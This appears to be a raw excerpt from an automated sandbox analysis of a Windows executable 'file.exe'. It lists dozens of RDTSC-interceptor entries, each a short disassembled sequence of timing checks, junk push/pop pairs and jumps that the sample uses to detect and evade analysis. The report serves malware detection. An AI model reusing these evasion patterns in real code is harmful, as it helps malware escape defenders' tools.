              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27B521 second address: 27B529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27B529 second address: 27B557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F466925DDA9h 0x00000009 popad 0x0000000a pop edx 0x0000000b je 00007F466925DDB0h 0x00000011 pushad 0x00000012 jp 00007F466925DD96h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27B557 second address: 27B561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27A9A7 second address: 27A9B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 js 00007F466925DD96h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27AB5B second address: 27AB7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4668B9A738h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27ACAF second address: 27ACC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jo 00007F466925DD96h 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27ACC6 second address: 27ACCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27ACCC second address: 27ACD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27ACD0 second address: 27ACD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27ACD4 second address: 27ACDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1E40BC second address: 1E40DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F4668B9A726h 0x0000000a jmp 00007F4668B9A738h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27EDEA second address: 27EE06 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F466925DDA2h 0x00000008 jl 00007F466925DD9Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27EE06 second address: 27EE20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F4668B9A74Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4668B9A72Ah 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2867EE second address: 2867F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2867F4 second address: 2867FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 286DB6 second address: 286DC0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F466925DD96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 286DC0 second address: 286DF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4668B9A737h 0x00000007 jmp 00007F4668B9A72Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 286DF0 second address: 286DFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F466925DD96h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 287104 second address: 28711E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4668B9A735h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28791A second address: 287952 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F466925DD96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F466925DDA0h 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 push edi 0x00000014 pop edi 0x00000015 jmp 00007F466925DDA7h 0x0000001a pop ecx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 289278 second address: 28928C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 jnl 00007F4668B9A726h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28CFCD second address: 28CFEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jnc 00007F466925DD96h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jno 00007F466925DDAAh 0x00000014 pushad 0x00000015 jbe 00007F466925DD96h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28D14B second address: 28D168 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F4668B9A737h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28D168 second address: 28D174 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28D174 second address: 28D1A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4668B9A72Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 js 00007F4668B9A726h 0x00000016 jmp 00007F4668B9A72Eh 0x0000001b pop edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28D1A0 second address: 28D1B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F466925DD9Dh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 293DAF second address: 293DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 293DB7 second address: 293DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F466925DD9Eh 0x0000000b push edx 0x0000000c pop edx 0x0000000d jnp 00007F466925DD96h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 293DCA second address: 293DEF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4668B9A728h 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F4668B9A726h 0x00000010 jmp 00007F4668B9A733h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29BAC7 second address: 29BACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29A136 second address: 29A156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F4668B9A72Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29A156 second address: 29A15A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29A96B second address: 29A96F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29A96F second address: 29A974 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29A974 second address: 29A97A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29B150 second address: 29B16B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466925DDA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29B16B second address: 29B1C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4668B9A739h 0x00000009 jmp 00007F4668B9A72Eh 0x0000000e popad 0x0000000f pop eax 0x00000010 push ebx 0x00000011 push edx 0x00000012 je 00007F4668B9A726h 0x00000018 jnp 00007F4668B9A726h 0x0000001e pop edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F4668B9A737h 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29B952 second address: 29B956 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29FB37 second address: 29FB5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4668B9A726h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4668B9A737h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29FB5C second address: 29FB62 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29FB62 second address: 29FB74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jng 00007F4668B9A726h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29FB74 second address: 29FB8A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F466925DD9Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29FB8A second address: 29FB8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A59E8 second address: 2A59FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466925DD9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A5AF6 second address: 2A5B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4668B9A738h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A5B12 second address: 2A5B16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A5B16 second address: 2A5B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A5B1C second address: 2A5B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F466925DD98h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A5B2D second address: 2A5B41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4668B9A72Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AC382 second address: 2AC388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AC388 second address: 2AC38C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AC38C second address: 2AC3AE instructions: 0x00000000 rdtsc 0x00000002 je 00007F466925DD96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F466925DDA6h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AC3AE second address: 2AC3BE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jo 00007F4668B9A732h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AC3BE second address: 2AC3C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AC3C4 second address: 2AC3DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jc 00007F4668B9A726h 0x0000000b jmp 00007F4668B9A72Ah 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B3E36 second address: 2B3E52 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F466925DD96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F466925DDA0h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B3E52 second address: 2B3E5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B3E5A second address: 2B3E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B3E5E second address: 2B3E62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B5E8B second address: 2B5E8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B5E8F second address: 2B5E93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B5E93 second address: 2B5E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B5E9B second address: 2B5EA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F4668B9A726h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B5EA5 second address: 2B5EA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B7996 second address: 2B79B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F4668B9A735h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B79B8 second address: 2B79C2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F466925DDA2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B79C2 second address: 2B79CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4668B9A726h 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C941B second address: 2C9428 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F466925DD96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C9428 second address: 2C9431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1121 second address: 2D1125 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1528 second address: 2D154F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F4668B9A72Fh 0x0000000b jmp 00007F4668B9A731h 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D154F second address: 2D1565 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466925DD9Fh 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1F32 second address: 2D1F38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1F38 second address: 2D1F55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466925DDA7h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1F55 second address: 2D1F5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1F5A second address: 2D1F63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1F63 second address: 2D1F8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4668B9A730h 0x0000000f push ebx 0x00000010 jmp 00007F4668B9A72Dh 0x00000015 pop ebx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D1F8C second address: 2D1FA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F466925DDA7h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D67C1 second address: 2D67C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D67C7 second address: 2D6804 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F466925DD9Fh 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F466925DDA5h 0x00000015 jc 00007F466925DDA2h 0x0000001b jng 00007F466925DD96h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D6804 second address: 2D6808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D6808 second address: 2D680D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2D680D second address: 2D681A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jc 00007F4668B9A72Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2E47CF second address: 2E47D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F1CF1 second address: 2F1CFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F1B89 second address: 2F1B8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F1B8D second address: 2F1BB2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4668B9A726h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4668B9A737h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F1BB2 second address: 2F1BB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F474D second address: 2F4751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F48BE second address: 2F48D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F466925DDA2h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F9196 second address: 2F919C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F919C second address: 2F91A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F91A2 second address: 2F91BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4668B9A732h 0x00000007 jnp 00007F4668B9A72Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2FA8B9 second address: 2FA8E5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F466925DD96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b jc 00007F466925DDBDh 0x00000011 jne 00007F466925DD98h 0x00000017 push eax 0x00000018 push edx 0x00000019 jno 00007F466925DD96h 0x0000001f jmp 00007F466925DD9Bh 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31275A second address: 31277A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4668B9A72Ch 0x00000008 jbe 00007F4668B9A726h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4668B9A72Eh 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 311876 second address: 31189D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466925DDA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F466925DD9Eh 0x00000010 rdtsc
